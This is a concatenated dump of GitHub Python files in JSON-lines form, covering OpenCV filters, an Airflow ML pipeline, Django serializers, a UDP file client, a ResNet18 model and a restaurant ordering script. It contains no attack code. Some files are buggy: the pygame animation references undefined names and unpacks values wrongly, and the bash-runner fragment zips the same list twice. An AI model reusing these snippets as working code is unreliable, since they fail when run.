subprocess.check_output(s)\n output_list.append(output)\n return output_list\n\n\n\ndef process_output(output):\n \"\"\"Does something with the output, which enters this function\n as a list. Do anything you want here, I'm just having fun\"\"\"\n\n for i in range(len(output)):\n \"this makes a list from the return of a ls from linux\"\n output[i] = output[i].split()\n\n stg = \"{} HealthCheckPassed \\n\\t{} INROTATION \\n\\t{} STATUSCODE\"\t\n for result0, result1, result2 in zip(output[0], output[1], output[1]):\n print(stg.format(result0, result1, result2))\n\n\nscripts = setup_scratch_dirs()\t\noutput = run_scripts(scripts)\nprocess_output(output)\n\nos.chdir(orig_dir)\nshutil.rmtree(temp_dir)\t\n\n\n","repo_name":"pbarton666/learninglab","sub_path":"experimental/py_run_bash_scripts.py","file_name":"py_run_bash_scripts.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"73432611881","text":"# 点菜小程序\nmenu_list = [ \"糖醋排骨\",\"水煮鱼\",\"大盘鸡\",\"拌黄瓜\",\"萝卜炒肉\",\"土豆丝\"] # 菜品目录\nprice = [48, 58,38, 12 , 45 ,15 ] # 菜品价格\norder_price = 0 # 菜品单价\norder_list = [] # 已点菜品\ncount = 0 # 计算总价\nk = 0 # 餐品数目\nn = 0\nseat_list = [2,2,2,4,4,4,6,6,6] # 每桌的座位数\nsitdown_list = [] # 存放已经被坐了的座位号\nguest_list =[] # 存放就餐人数量\nprint(\"**************欢迎光临大连工业大学小菜馆**************\")\nx = int(input(\"请问您几位: \"))\nguest_list.append(x)\nfor y in seat_list:\n n += 1\n if y >= x:\n sitdown_list.append(seat_list.index(y))\n seat_list.remove(y)\n print(\"您的座位是{}号桌\".format(sitdown_list))\n break\nif n != seat_list.index(y) + 1:\n print(\"对不起,本餐厅没有合适的座位。\")\nelse:\n print(\"请您参考下列菜单菜品价格进行点菜\")\n print(\"Python 365 菜品\\n\",menu_list)\n print(\"Python 365 菜单价格\\n\",price)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n def order_1(menu_list, order_list,server1):\n order_list.append(server1)\n print('已经点购菜名:{}'.format(order_list))\n a = menu_list.index(server1)\n return(a)\n while ( server != 'N'):\n if (server != 'C'):\n k+=1\n order_price = order_1(menu_list, order_list, server)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n count += price[order_price]\n else:\n if (k==0):\n print(\"!!!您还未点任何菜品!!!\")\n server = input('请输入菜品进行点餐: ')\n else:\n cancle = input('请输入要取消的菜品: ')\n b = menu_list.index(cancle)\n order_list.remove(cancle)\n count -= price[b]\n k -=1\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n print(\"一共点了{0}道菜品,共计{1}元\".format(k,count))\n while True:\n fee = float(input(\"您支付的金额是:\"))\n if float(fee) < float(count):\n print(\"***************您支付的金额不足***************\")\n continue\n else:\n print(\"您支付了{}元,找您{}元\".format(count, fee - count))\n break","repo_name":"Bryson582/Python_365","sub_path":"ordermeal.py","file_name":"ordermeal.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"933276943","text":"import numpy as np\nimport cv2\n\nimage = cv2.imread(\"images/dog.jpg\", cv2.IMREAD_GRAYSCALE)\nif image is None:\n raise Exception(\"영상파일 읽기 오류\")\n\n\n# SoG 연산\ngaus = cv2.GaussianBlur(image, (7, 7), 0, 0) # 가우스마스크 적용\ndst1 = cv2.Laplacian(gaus, cv2.CV_16S, 7) # 라플라시안 수행\n\n# DoG 연산\ngaus1 = cv2.GaussianBlur(image, (3, 3), 0)\ngaus2 = cv2.GaussianBlur(image, (9, 9), 0)\ndst2 = gaus1 - gaus2\n\ncv2.imshow(\"image\", image)\ncv2.imshow(\"dst1- LoG\", dst1.astype('uint8'))\ncv2.imshow(\"dst2- DoG\", dst2)\ncv2.waitKey(0)\n","repo_name":"yujongyeop/image-processing","sub_path":"week07/edge_DOG.py","file_name":"edge_DOG.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31916048729","text":"# 九章的python代码,这里体现了python中栈操作的便利性。\n# http://www.jiuzhang.com/solutions/binary-tree-zigzag-level-order-traversal/\nfrom lintcode import TreeNode\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: A list of list of integer include \n the zig zag level order traversal of its nodes' values\n \"\"\"\n def preorder(self, root, level, res):\n if root:\n if len(res) < level+1: res.append([])\n if level % 2 == 0: \n res[level].append(root.val)\n else: \n res[level].insert(0, root.val)\n self.preorder(root.left, level+1, res)\n self.preorder(root.right, level+1, res)\n def zigzagLevelOrder(self, root):\n self.results = []\n self.preorder(root, 0, self.results)\n return self.results","repo_name":"XingxingHuang/Leetcode-for-Fun","sub_path":"lintcode/lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_name":"lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"}
+{"seq_id":"86642291565","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python import PythonOperator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\n\n\ndef _prepare_dataset():\n dataset = pd.read_csv('~/airflow-docker/downloads/dataset_diabetes/diabetic_data.csv')\n dataset = dataset.drop(['encounter_id', 'patient_nbr'], axis=1)\n dataset = dataset.replace(to_replace='?', value=np.NaN)\n dataset = dataset.dropna(axis=1)\n dataset = _labels_to_numbers(dataset, 'readmitted')\n dataset = pd.get_dummies(dataset, drop_first=True)\n dataset = _balance_dataset(dataset, 'readmitted')\n dataset.to_csv('~/airflow-docker/downloads/clean_dataset.csv', index=False)\n\ndef _labels_to_numbers(dataset, column):\n labels = dataset[column].unique()\n num_labels = len(labels)\n label_dict = dict(zip(labels, range(0, num_labels)))\n numerical_labels = dataset[column].map(label_dict)\n return dataset.assign(**{column: numerical_labels})\n\ndef _balance_dataset(dataset, target_column):\n value_counts = dataset[target_column].value_counts()\n min_count = min(value_counts)\n return dataset.groupby(target_column).sample(n=min_count, random_state=42)\n\ndef _get_model_score(filepath, target_column, model):\n X, y = _split_dataset(filepath, target_column)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n return f1_score(y_test, y_pred, average='macro')\n\ndef _split_dataset(filepath, target_column):\n dataset = pd.read_csv(filepath)\n X = dataset.drop(target_column, axis=1)\n y = dataset[target_column]\n return X, y\n\ndef _train_best_model(ti, filepath, target_column):\n scores = ti.xcom_pull(task_ids=[\n 'get_svc_score',\n 'get_knn_score',\n 'get_rfc_score'\n ])\n\n model, model_name = _select_best_model(scores)\n X, y = _split_dataset(filepath, target_column)\n model.fit(X, y)\n with open(f'/home/joshua/airflow-docker/downloads/{model_name}_model.pk', 'wb') as f:\n pickle.dump(model, f)\n \n return max(scores)\n\ndef _select_best_model(scores):\n best_model = np.argmax(np.array(scores))\n if best_model == 0:\n return SVC(), 'svc'\n elif best_model == 1:\n return KNeighborsClassifier(), 'knn'\n else:\n return RandomForestClassifier(), 'rfc'\n\n\nwith DAG(\n dag_id='ml_pipeline',\n schedule_interval='@monthly',\n start_date=datetime(2022, 1, 1),\n catchup=False\n) as dag:\n\n download_dataset = BashOperator(\n task_id='download_dataset',\n bash_command='curl -o ~/airflow-docker/downloads/dataset_diabetes.zip https://archive.ics.uci.edu/ml/machine-learning-databases/00296/dataset_diabetes.zip'\n )\n\n unzip_dataset = BashOperator(\n task_id='unzip_dataset',\n bash_command='unzip ~/airflow-docker/downloads/dataset_diabetes.zip -d ~/airflow-docker/downloads/'\n )\n\n prepare_dataset = PythonOperator(\n task_id='prepare_dataset',\n python_callable=_prepare_dataset\n )\n\n get_svc_score = PythonOperator(\n task_id='get_svc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': SVC()}\n )\n\n get_knn_score = PythonOperator(\n task_id='get_knn_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': KNeighborsClassifier()}\n )\n\n get_rfc_score = PythonOperator(\n task_id='get_rfc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': RandomForestClassifier()}\n )\n\n train_best_model = PythonOperator(\n task_id='train_best_model',\n python_callable=_train_best_model,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted'\n }\n )\n\n download_dataset >> unzip_dataset >> prepare_dataset >> [get_svc_score, get_knn_score, get_rfc_score] >> train_best_model\n ","repo_name":"chiny-jc/airflow-workflows","sub_path":"ml_pipeline.py","file_name":"ml_pipeline.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10535767251","text":"################\n# közelítős animáció kép pacával\n\nimport random\nimport pygame as pg\nimport numpy as np\n\nrandom.seed()\n\nWIDTH, HEIGHT = 1550, 800\n\nWIN = pg.display.set_mode((WIDTH, HEIGHT))\n\nBACKGROUND = (128, 220, 12)\n\nFPS = 50\n\nx, y, x1, y1 = 0, HEIGHT / 2, WIDTH / 2, HEIGHT / 2\nu, v, u1, v1 = 0, 0, 0, 0\ndiff = (x1 - x, y1 - y)\nprint(diff[0], diff[1])\n\n\ndef update(x, y, u, v, x1, y1, u1, v1, phase):\n global diff\n if phase == 1:\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n if f > 30:\n x += u\n y += v\n else:\n phase = 2\n if phase == 2:\n u, v = v, -u\n x += u\n y += v\n u, v = np.co * u - np.si * v, np.si * u, np.co * v\n return x, y, u, v, x1, y1, u1, v1\n\ndef draw_window(x, y, u, v, x1, y1, u1, v1, phase):\n WIN.fill(BACKGROUND)\n x, y, u, v, x1, y1, u1, v1 = update(x, y, u, v, x1, y1, u1, v1, phase)\n pg.draw.rect(WIN, (255, 255, 0), ((RADIUS, RADIUS), (WIDTH - 2 * RADIUS, HEIGHT - 2 * RADIUS)), width=0)\n pg.draw.circle(WIN, (0, 0, 0), (x, y), width=0, radius=20)\n pg.draw.circle(WIN, (0, 0, 255), (x1, y1), width=0, radius=20)\n pg.display.update()\n return x, y, u, v, x1, y1, u1, v1\n\n\ndef main():\n clock = pg.time.Clock()\n run = True\n phase = 1\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n len = 5\n alpha = np.pi / 20\n si = np.sin(alpha)\n co = np.cos(alpha)\n u = 5 * diff[0] / f\n v = 0 * diff[1] / f\n\n while run:\n clock.tick(FPS)\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n x, y, u, v, x1, y1, u1, v1 = draw_window(x, y, u, v, x1, y1, u1, v1, phase)\n pg.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"egyszem/emotion_through_motions","sub_path":"test6.py","file_name":"test6.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"24424431101","text":"# Actualizado por:\n# Yeimmy Katherin Lugo \n# 07/06/2023\n\n\nfrom rest_framework import serializers\nfrom .models import Devices, Project, Template, DatosSensores, SharedProject, graphics\n\n\n\n# class SharedProjectValidationSerializer(serializers.Serializer):\n# idrandom = serializers.CharField()\n\n# def validate_idrandom(self, value):\n# try:\n# project = Project.objects.get(idrandom=value)\n# except Project.DoesNotExist:\n# raise serializers.ValidationError(\"Invalid idrandom\")\n# return value\n\nclass SharedRelationSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True) # Campo de solo lectura para el ID\n\n class Meta:\n model = SharedProject\n fields = ['id', 'user', 'project', 'timestamp']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n\n \nclass ShareProjectSerializer(serializers.Serializer):\n idrandom = serializers.CharField(max_length=300) # Campo de cadena de caracteres con una longitud máxima de 300 caracteres\n # Define el campo \"idrandom\" que se serializará/deserializará\n\n \nclass ProjectSerializer(serializers.ModelSerializer):\n relationUserProject = serializers.ReadOnlyField(source='relationUserProject.username')\n # Define un campo de solo lectura \"relationUserProject\" que obtiene el nombre de usuario del campo \"relationUserProject\" del objeto relacionado\n\n class Meta:\n model = Project\n fields = ['id', 'idrandom', 'name', 'location', 'description', 'relationUserProject']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserProject en el usuario autenticado\n validated_data[\"relationUserProject\"] = user\n # Creamos el objeto Project usando los datos validados actualizados\n project = Project.objects.create(**validated_data)\n return project\n\nclass DevicesSerializer(serializers.ModelSerializer):\n relationProject = serializers.PrimaryKeyRelatedField(queryset=Project.objects.all(), default=serializers.CurrentUserDefault())\n # Utilizamos el campo PrimaryKeyRelatedField para obtener el ID del proyecto en lugar del nombre\n class Meta:\n model = Devices\n # Asocia el serializador al modelo \"Devices\"\n fields = [\n \"id\", # Campo de identificación del dispositivo\n \"name\", # Campo de nombre del dispositivo\n \"location\",# Campo de ubicación del dispositivo\n \"template\",\n \"relationProject\", # Campo de relación con el usuario propietario del dispositivo\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n \n def create(self, validated_data):\n project_id = self.context['request'].parser_context['kwargs']['project_id']\n project = Project.objects.get(id=project_id)\n validated_data.pop('relationProject')\n device = Devices.objects.create(relationProject=project, **validated_data)\n return device\n \n \nclass TemplateSerializer(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserDevice en el usuario autenticado\n validated_data[\"relationUserTemplate\"] = user\n # Creamos el objeto relationUserDevice usando los datos validados actualizados\n template = Template.objects.create(**validated_data)\n return template\n \nclass TemplateSerializerShared(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n\n \n \n \nclass DatosSensoresSerializer(serializers.ModelSerializer):\n relationTemplatePin = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = DatosSensores\n fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n read_only_fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n \n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplatePin') # Eliminar la clave 'relationTemplateGraphics'\n sensores = DatosSensores.objects.create(relationTemplatePin=template, **validated_data)\n return sensores\n\nclass GraphicsSerializer(serializers.ModelSerializer):\n relationTemplateGraphics = serializers.PrimaryKeyRelatedField(queryset=Template.objects.all(), default=serializers.CurrentUserDefault())\n\n class Meta:\n model = graphics\n fields = [\n \"id\",\n \"titlegraphics\",\n \"namegraphics\",\n \"aliasgraphics\",\n \"location\",\n \"is_circular\",\n \"color\",\n \"ports\",\n \"size_increase\", \n \"size_decrease\",\n \"relationTemplateGraphics\",\n ]\n read_only_fields = ['id']\n\n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplateGraphics') # Eliminar la clave 'relationTemplateGraphics'\n graphicsx = graphics.objects.create(relationTemplateGraphics=template, **validated_data)\n return graphicsx\n\n\n","repo_name":"PIANTAIOT/Pianta---IOT---Backend-","sub_path":"Pianta/Project_Api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6402881010","text":"import socket\nimport os\nimport sys\n\n\n#function that asks the user for what it wants to do and returns an integer.\n#It returns the command if a valid command if a valid command has been\n#requested, otherwise it returns 0.\ndef inputReceiver():\n print(\"1) get the list of file in the server\")\n print(\"2) get the contents of a file from the server\")\n print(\"3) upload a file on the server\")\n print(\"4) exit\")\n command = input(\"Input a valid command[1/2/3/4]: \")\n if(command.isnumeric()):\n command = int(command)\n if command == 1 or command == 2 or command == 3 or command == 4:\n return command\n else:\n return 0\n else :\n return 0\n\n\n#initialize socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n#set server address\nserver_address = (\"localhost\", 12000)\n\n#starting main continious loop, which controlls the UPD communications with the server\nwhile True:\n\n #waitingForCommand will be used to ask the user for a valid command until one is entered\n waitingForCommand = True\n\n #while loop askd for user to input a valid command until it is entered\n while waitingForCommand:\n commandRequested = int(inputReceiver())\n \n if commandRequested != 0:\n print(\"command accepted\")\n waitingForCommand = False\n else :\n print(\"command not acceptable\")\n\n #incapsulating in a try to catch any exeptions\n try:\n \n if commandRequested == 1:\n\n #sending the request of the list message to the server\n message = \"get list\"\n sock.sendto(message.encode(), server_address)\n\n #receiving the list from the server. the first word is the number of files in the list, then the filenames are listed\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #checking if the server sent a valid answer\n if data.isdigit():\n\n #printing the number of files\n print(\"there are \" + str(data) + \" files on the server\")\n\n #waiting for server to send the list of files\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #printing the filenames\n print(str(data))\n\n #printing the error message of the server, if the awnswer wasn't valid\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n elif commandRequested == 2:\n\n #requesting the filename of the file the user wants to download\n fileName = input(\"input the name of the file you want to download: \")\n\n #sending the request of the file to the server\n message = \"get file\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n\n #receiving the request flag\n #if the flag is 0 then the file has been found\n data, server = sock.recvfrom(4096)\n data = data.decode()\n \n if data == \"0\":\n\n #downloading the file on the client\n print(\"file found on the server\\ndownloading the file...\")\n\n #receiving the file contents from the server\n data, server = sock.recvfrom(4096)\n data = data.decode()\n #creating a new file with as name the fileName and writing the contents\n fileFolder = os.path.join(os.getcwd(),\"client_files\")\n filePath = os.path.join(fileFolder,fileName)\n newFile = open(filePath, \"w\")\n newFile.write(data)\n print(\"file downloaded\")\n\n #if the flag is 1 then the file has not been found\n elif data == \"1\":\n print(\"the file has not been found on the server\")\n\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n elif commandRequested == 3:\n\n #requesting the filename of the file the user wants to upload\n fileName = input(\"input the name of the file you want to upload: \")\n\n #reading the file\n fileFolder = os.path.join(os.getcwd(), \"client_files\")\n filePath = os.path.join(fileFolder, fileName)\n file = open(filePath, \"r+\")\n data = file.read()\n\n #sending the request, filename and file contents to the server\n message = \"upload\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n sock.sendto(data.encode(), server_address)\n file.close()\n\n print(\"sending \" + fileName + \" to the server...\")\n\n #waiting for the server to awnser, telling the client the file has been uploaded\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #if the request flag is == \"0\" the file has been correctly uploaded\n if data == \"0\":\n print(fileName + \" uploaded correctly to the server\")\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n #closing the client program\n elif commandRequested == 4:\n sock.close()\n sys.exit()\n\n except Exception as e:\n print(e)\n \n print(\"\\n\\n\\n\\n\")\n","repo_name":"Oldranda1414/ProgettoReti","sub_path":"src/client/UDPClient.py","file_name":"UDPClient.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11890456709","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/11 16:34\n# @Author : zyf\n# @File : ResNet_18.py\n# @Software: PyCharm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\n'''\n CNN经典网络结构复现:LeNet5、AlexNet、VGG、ResNet、InceptionNet等\n ResNet18网络结构:18 = 1(conv1) + 2*2(第一个残差部分) +2*2(第二个残差部分) +2*2(第三个残差部分) +2*2(第四个残差部分) + 1(FC)\n 需要设计一个残差块,ResBlock设计:\n 包含两个卷积层,每个卷积层后面跟一个归一化\n kernel_size = 3 卷积核大小\n stride不固定,目的是为了降采样,保证残差的维度与真正输出的维度一致\n\n 第一部分卷积conv1:\n 输入:224*224*3\n 输出:112*112*64\n conv:kernel_size = 7*7 stride=2 padding=3\n \n 输入:112*112*64\n 输出:56*56*64\n max pooling : kernel_size =3 stride=2 padding=1\n \n 第一个残差部分conv2:\n 输入:56*56*64 输出:56*56*64\n 包含两个残差块,每个残差块里面有两个卷积层\n \n 第二个残差部分conv2:\n 输入:56*56*64 输出:28*28*128\n 包含两个残差块,每个残差块里面有两个卷积层,\n 其中第一个残差块要做下采样\n 第三个残差部分conv2:\n 输入:28*28*128 输出:14*14*256\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 第四个残差部分conv2:\n 输入:14*14*256 输出:7*7*512\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 自定义池化和全连接层\n avg_pool\n fc \n \n 注意:其实这部分的残差块与ResNet18的结构是一样的,不过是每个残差部分的数量不一致罢了,这里分开实现纯粹是为了代码熟练度。\n ResNet18 18= 1 + 2*2 + 2*2 +2*2 +2*2 + 1\n ResNet34 34= 1 + 2*3 + 2*4 +2*6 +2*3 + 1 \n'''\n\n\n# 设计18和34残差块,ResNet18和ResNet34 用的3*3的卷积,而且每个残差块都只有两层卷积\nclass ResBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_channel, out_channel, stride=1):\n super(ResBlock, self).__init__()\n # 残差块内的第一个卷积,当stride!=1时,要进行下采样downsample\n # 例如56*56*64 -> 28*28*128 的时候要进行downsample,这时候要stride=2\n self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, kernel_size=3, stride=stride,\n padding=1)\n # 卷积后跟的bn层\n self.bn1 = nn.BatchNorm2d(out_channel)\n # 激活函数ReLu\n self.relu = nn.ReLU(inplace=True)\n # 残差块内的第二个卷积,k=3,s=1,p=1,这个卷积层没什么变化,in_channels和out_channels 是一样的\n self.conv2 = nn.Conv2d(in_channels=out_channel, out_channels=out_channel, kernel_size=3, stride=1, padding=1)\n # 第二个bn层\n self.bn2 = nn.BatchNorm2d(out_channel)\n\n # 快捷连接设计,也就是右边x的部分,在做残差相加的时候,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n self.shortcut = None\n print(in_channel, out_channel, stride)\n # 重点部分,当残差块要进行downsample的时候,快捷连接也需要进行维度的同步,\n # 同步的方法是采用一个1*1的卷积,同时stride=2\n if stride != 1 or in_channel != out_channel:\n self.shortcut = nn.Sequential(\n # 采用1*1的卷积进行维度同步 。下采��,W*H会变小 。\n nn.Conv2d(in_channel, out_channel, kernel_size=1, stride=stride),\n nn.BatchNorm2d(out_channel)\n )\n\n # 前向传播\n def forward(self, x):\n # 残差块的右边x\n identity = x\n # 残差块计算流程\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n # 快捷连接计算的结果\n if self.shortcut is not None:\n identity = self.shortcut(x)\n # 两个结果相加\n out += identity\n out = self.relu(out)\n return out\n\n\n# 设计ResNet网络结构\nclass ResNet(nn.Module):\n def __init__(self, nums=1000):\n super(ResNet, self).__init__()\n # 分类数\n self.nums = nums\n # 第一部分卷积conv1 输入:224*224*3\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n )\n # 第一个残差部分,包含两个残差块,由于没有涉及残差维度变化,两个残差块都是一样的\n self.conv2 = nn.Sequential(\n ResBlock(in_channel=64, out_channel=64),\n ResBlock(in_channel=64, out_channel=64)\n )\n # 第二个残差部分,包含两个残差块,四个卷积层\n self.conv3 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=64, out_channel=128, stride=2),\n ResBlock(in_channel=128, out_channel=128)\n )\n # 第三个残差部分,包含两个残差块,四个卷积层\n self.conv4 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=128, out_channel=256, stride=2),\n ResBlock(in_channel=256, out_channel=256)\n )\n # 第四个残差部分,包含两个残差块,四个卷积层\n self.conv5 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=256, out_channel=512, stride=2),\n ResBlock(in_channel=512, out_channel=512)\n )\n # 自定义池化层,用来固定输出的size大小\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n # 定义全连接层,输出是类别数\n self.fc = nn.Linear(512, self.nums)\n\n # 前向传播\n def forward(self, x):\n # 卷积层\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n # 自定义池化,固定输出大小\n x = self.avg_pool(x)\n # 将特征向量展开\n x = torch.flatten(x, 1)\n # 全连接层\n x = self.fc(x)\n return x\n\nx = torch.rand((2,3,224,224))\nres = ResNet()\nprint(res)\nout = res(x)\nprint(out)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nres = res.to(device)\nsummary(res, (3, 224, 224))\n","repo_name":"zyf-xtu/pytorch_models","sub_path":"cnn_models/ResNet_18.py","file_name":"ResNet_18.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"zh","doc_type":"code","stars":60,"dataset":"github-code","pt":"18"}
+{"seq_id":"35752499755","text":"import logging\nimport os\nimport unittest\nimport pandas as pd\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom helper import *\nfrom l2_orderbook_tops import l2_orderbook_tops\n\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n\n\nclass TestWatch(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(TestWatch, self).__init__(*args, **kwargs)\n\n def test_bid_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 50.05, 0.02, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 45.05, 0.02, 1)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-2], 30)\n\n def test_ask_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 149.00, 0.02, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 151.00, 0.02, 0)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-1], 